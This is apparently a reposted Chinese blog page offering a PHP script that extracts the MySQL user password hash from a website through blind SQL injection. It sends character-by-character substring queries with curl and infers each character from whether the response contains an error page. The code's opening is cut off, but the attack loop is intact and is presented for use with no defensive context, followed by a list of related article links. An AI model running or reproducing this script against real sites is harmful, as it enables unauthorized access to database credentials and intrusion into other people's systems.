一段代码，SQL注入猜解数据库用户密码-白红宇

一段代码，SQL注入猜解数据库用户密码

阅读量：6641 次

发布时间：2019-06-25

本文共 700 字，大约阅读时间需要 2 分钟。


     $value){                $query = urlencode("46 and (select substr((select password from mysql.user limit 1),".$i.",1))='".$value."'");                $url = $base.$query;                curl_setopt($ch, CURLOPT_URL, $url);                curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);                curl_setopt($ch, CURLOPT_HEADER, 0);                $back = curl_exec($ch);                /*$code = curl_getinfo($ch,CURLINFO_HTTP_CODE);                if($code == 200){                    echo $value;                    break;                }                */                if(!strpos($back,'error.jsp')){                    echo $value;                    break;                }        }    }?>

转载地址：http://huovo.baihongyu.com/

你可能感兴趣的文章

Safengine NoobyProtect 过注册半自动脚本

查看>>

redis_3.0.7_sds.c_sdsclear()

查看>>

MySQL阶段五——主从复制原理、主从延迟原理与解决

查看>>

我的友情链接

查看>>

JS 有趣的应用 : Array.prototype.slice.call(arguments,0)

查看>>